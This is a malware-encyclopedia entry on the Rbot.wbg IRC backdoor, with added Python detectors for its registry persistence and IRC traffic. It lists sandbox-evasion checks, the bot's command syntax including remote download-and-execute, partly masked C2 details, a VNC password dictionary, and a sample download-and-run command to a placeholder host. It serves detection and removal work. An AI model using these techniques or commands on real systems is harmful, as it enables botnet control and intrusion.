
Backdoor.Win32.Rbot.wbg

Detected Nov 23 2008 18:09 GMT
Released Nov 23 2008 21:39 GMT
Published Mar 24 2011 12:24 GMT


Technical Details

This Trojan provides a malicious user with remote access to the infected computer. It is a Windows application (PE EXE file). It is 45 780 bytes in size. It is packed using SVKP. It is written in C++.

Installation

When it launches, the malware checks whether any system monitors or debuggers are running by referencing device drivers through the following device paths:

\\.\SICE
\\.\SIWVID
\\.\NTICE
\\.\REGSYS
\\.\REGVXG
\\.\FILEVXG
\\.\FILEM
\\.\TRW
\\.\ICEEXT
It checks whether any process has been launched by a debugger or remote debugger. It also checks the name of the computer for the presence of the following strings:
nepenthes
currentuser
vmware
honey
sandbox
If even one of the listed conditions is detected, the malware displays an error message and stops running. Otherwise, it copies its executable file to:
%Program Files%\Common Files\System\molox.exe
or
C:\RECYCLER\ molox.exe
and sets the Hidden and System attributes on the file. To ensure that it is launched automatically each time the system is rebooted, it adds a link to its executable file in the system registry autorun key:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsSystem32"="%Program Files%\Common Files\System\molox.exe"
or
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsSystem32"=" C:\RECYCLER\ molox.exe"


Payload

Next, the malware adds its executable file to the list of authorized applications in Windows Firewall:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%Program Files%\Common Files\System\molox.exe"="%Program Files%\Common Files\System\molox.exe:*:Enabled:WindowsSystem32"
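As an added example that is not part of the Kaspersky description, the following Python checks a text dump of the registry for the autorun value and the Windows Firewall allow-list entry described above. The dump format (the [key] / "name"="value" form this page itself uses, plain string values only) and the sample dump are constructed assumptions, as is the whitespace-insensitive path matching.

```python
import re
def _norm(s):
    # Lower-case, whitespace-free form so the stray space printed above ("C:\RECYCLER\ molox.exe") still matches.
    return re.sub(r"\s+", "", s).lower()

# Indicators taken from the description above.
MOLOX_PATHS = {_norm(r"%Program Files%\Common Files\System\molox.exe"),
               _norm(r"C:\RECYCLER\molox.exe")}
RUN_KEY = _norm(r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run")
FW_LIST_KEY = _norm(r"HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters"
                    r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")
VALUE_LINE = re.compile(r'^"([^"]*)"\s*=\s*"(.*)"$')

def parse_reg_dump(text):
    # Parse a [key] / "name"="value" text dump (assumption: plain string values, one per line).
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = _norm(line[1:-1].replace("HKEY_LOCAL_MACHINE", "HKLM"))
            keys.setdefault(current, {})
        elif current is not None:
            m = VALUE_LINE.match(line)
            if m:
                keys[current][m.group(1)] = m.group(2)
    return keys

def find_molox_persistence(text):
    # Return (kind, name, detail) tuples for the autorun value and the firewall
    # allow-list entry; an empty list means neither indicator is present.
    findings = []
    for key, values in parse_reg_dump(text).items():
        for name, value in values.items():
            if key == RUN_KEY and _norm(value) in MOLOX_PATHS:
                findings.append(("autorun", name, value))
            elif key == FW_LIST_KEY and _norm(name) in MOLOX_PATHS:
                fields = value.split(":")   # path:*:Enabled:WindowsSystem32
                state = fields[-2].lower() if len(fields) >= 2 else "unknown"
                findings.append(("firewall-allow", name, state))
    return findings

# Constructed sample dump (not from a real machine): both indicators plus a benign Run value.
SAMPLE_DUMP = r"""
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe"
"WindowsSystem32"=" C:\RECYCLER\ molox.exe"
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%Program Files%\Common Files\System\molox.exe"="%Program Files%\Common Files\System\molox.exe:*:Enabled:WindowsSystem32"
"""
```

The same two keys are the ones the removal instructions below tell you to clean, so a non-empty result after cleanup means the entries were not fully removed.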
Then, the bot connects to the following IRC server in order to receive commands from the malicious user:
dend***p.hu
When it connects to the server, it registers with the following parameters:
USER <rnd> "fo<rnd2>.net" "lol" :<rnd>
where <rnd> is a sequence of letters and <rnd2> is a decimal number.

Next, the bot connects to the IRC channel:

#db
Following a successful connection to the server, the bot awaits the following commands from the malicious user:
  • !v means receive a new version of the bot.
  • !d means disconnect.
  • !r means reconnect to the same server.
  • !q means connect to another server.
  • !n [nickname] means change the nickname to [nickname].
  • !restart means restart the bot.
  • !scanstop means stop scanning.
  • !patch means modify (patch) the driver "tcpip.sys".
  • !total means all downloads are carried out by the bot through "ftpd".
  • !vnc means report the status of the VNC (Virtual Network Computing) server.
  • !getcftp means retrieve the current "cftp" settings.
  • !j (#channel_name) means join #channel_name.
  • !p (#channel_name) means part (leave) #channel_name.
  • !bk (x) means launch the operation to kill the bot, x being the number of cycles.
  • !setcftp (host) (port) (user) (password) (file) means change the cftp server settings.

The malware also attempts to gain access to FTP servers and remote desktops by scanning the network when it receives the following command:

!scan (X) (random / logical) (ip/b/y) (vnc_mode) (transfer_mode) [scanning_range]
The following parameters may be applied to this command:
  1. X is the number of simultaneously launched threads.
  2. (random / logical) selects random (1) or logical (0) scanning.
  3. (ip/b/y) selects the target: a single IP address, a range of addresses in class C and D subnetworks, or a range of addresses in a class B subnetwork.
  4. VNC_mode:
    1 means with vnc scanning,
    2 means vnc scanning and obtaining administrative access,
    3 means vnc scanning only.
  5. Transfer_mode:
    a. 0 means all bots use "ftp".
    b. 1 means local network bots use "cftp", while WAN bots use "ftp".
    c. 2 means all bots use "cftp".
  6. Scanning_range is the range (in the form 127.0.x.x) to be scanned by the bots (they do not scan empty network ranges).

The bot may also download files and launch them for execution, by receiving the command:

!h <configuration_data> (URL) [directory_for_download] (mode)
Configuration_data is a download string presented in the form of an MD5 hash.

URL is the link for downloading the file.

Directory_for_download is the directory in which the downloaded file will be saved.

Mode:
0 means download only
1 means download and execute
2 means download, execute, and delete itself

The command may also be given in a shorter form:

!h <configuration_data>

where Configuration_data is a deletion string presented in the form of an MD5 hash.
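As an added example that is not part of the original description, the following Python turns the registration line, the command list, and the !scan and !h parameter descriptions above into detection logic for a network sensor or IRC proxy log. The sample session, the hash and the URL are constructed placeholders, and the assumption that the bot separates command arguments with whitespace (as the command syntax above suggests) is mine.

```python
import re
# Registration line and commands from the description above; the mode tables follow the !scan and !h parameters.
USER_SIG = re.compile(r'^USER [A-Za-z]+ "fo\d+\.net" "lol" :[A-Za-z]+$')
PRIVMSG = re.compile(r"^(?::\S+ )?PRIVMSG (\S+) :(.*)$")
SIMPLE = {"!v", "!d", "!r", "!q", "!restart", "!scanstop", "!patch", "!total", "!vnc", "!getcftp"}
VNC_MODES = {"1": "vnc scan", "2": "vnc scan + admin access", "3": "vnc scan only"}
XFER_MODES = {"0": "all ftp", "1": "LAN cftp / WAN ftp", "2": "all cftp"}
H_MODES = {"0": "download", "1": "download+execute", "2": "download+execute+self-delete"}

def parse_bot_command(text):
    # Describe one channel message as a dict; None if it is not a recognised bot command.
    parts = text.strip().split()
    if not parts or not parts[0].startswith("!"):
        return None
    cmd, args = parts[0].lower(), parts[1:]
    if cmd in SIMPLE:
        return {"cmd": cmd}
    if cmd in ("!n", "!j", "!p", "!bk") and len(args) == 1:
        return {"cmd": cmd, "arg": args[0]}
    if cmd == "!setcftp" and len(args) == 5:
        return {"cmd": cmd, **dict(zip(("host", "port", "user", "password", "file"), args))}
    if cmd == "!scan" and len(args) >= 5:   # !scan X order target vnc_mode transfer_mode [range]
        return {"cmd": cmd, "threads": args[0], "target": args[2],
                "order": {"1": "random", "0": "logical"}.get(args[1], args[1]),
                "vnc_mode": VNC_MODES.get(args[3], args[3]), "transfer_mode": XFER_MODES.get(args[4], args[4]),
                "range": args[5] if len(args) > 5 else None}
    if cmd == "!h" and len(args) == 1:      # "!h <md5>" is the short (deletion) form
        return {"cmd": cmd, "action": "delete", "config": args[0]}
    if cmd == "!h" and len(args) in (3, 4):  # !h <md5> URL [directory] mode
        return {"cmd": cmd, "action": H_MODES.get(args[-1], args[-1]), "config": args[0],
                "url": args[1], "directory": args[2] if len(args) == 4 else None}
    return None

def scan_irc_lines(lines):
    alerts = []
    for line in lines:
        m = PRIVMSG.match(line)
        parsed = parse_bot_command(m.group(2)) if m else None
        if USER_SIG.match(line):
            alerts.append(("registration", line))
        elif parsed:
            alerts.append(("command", {"channel": m.group(1), **parsed}))
    return alerts
# Constructed sample session, not captured traffic; the hash and URL are placeholders.
SAMPLE_LINES = [
    'USER qwerty "fo4821.net" "lol" :qwerty',
    ':op!x@example.invalid PRIVMSG #db :!scan 50 1 b 2 1 10.0.x.x',
    ':op!x@example.invalid PRIVMSG #db :!h 0123456789abcdef0123456789abcdef http://update.invalid/x.exe 1',
    ':op!x@example.invalid PRIVMSG #db :hello everyone',
]
```

The USER signature is the cheapest indicator to alert on, since it fires on the bot's very first registration with the server, before any command is issued.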

When it gains full access to a cftp server, the bot uses the following settings:

Host – oli***yip.hu
User – u2m6g
Password – k3***mt
File – lol.jpg

To gain access to a VNC server, the bot tries to guess the password, using the following strings first as a dictionary:
123
1234
12345
123456
1234567
12345678
abc
abcd
1
admin
pass
password
love

Removal instructions

If your computer does not have antivirus software installed and is infected by this malicious program, follow the instructions below to delete it:

  1. Use Task Manager to terminate the bot's process "molox.exe".
  2. Delete the original malicious file (its location will depend on how the program originally penetrated the infected computer).
  3. Delete the following parameters from the system registry keys (see What is a system registry and how do I use it?):
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "WindowsSystem32"="%Program Files%\Common Files\System\molox.exe"
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "WindowsSystem32"=" C:\RECYCLER\ molox.exe"
    [HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "%Program Files%\Common Files\System\molox.exe"="%Program Files%\Common Files\System\molox.exe:*:Enabled:WindowsSystem32"
  4. Delete the following files:
    %Program Files%\Common Files\System\molox.exe
    or
    C:\RECYCLER\ molox.exe
  5. Perform a full scan of the computer using Kaspersky Anti-Virus with up-to-date antivirus databases.


Backdoor

Backdoors are designed to give malicious users remote control over an infected computer. In terms of functionality, Backdoors are similar to many administration systems designed and distributed by software developers.

These types of malicious programs make it possible to do anything the author wants on the infected computer: send and receive files, launch files or delete them, display messages, delete data, reboot the computer, etc.

The programs in this category are often used in order to unite a group of victim computers and form a botnet or zombie network. This gives malicious users centralized control over an army of infected computers which can then be used for criminal purposes.

There is also a group of Backdoors which are capable of spreading via networks and infecting other computers as Net-Worms do. The difference is that such Backdoors do not spread automatically (as Net-Worms do), but only upon a special “command” from the malicious user that controls them.
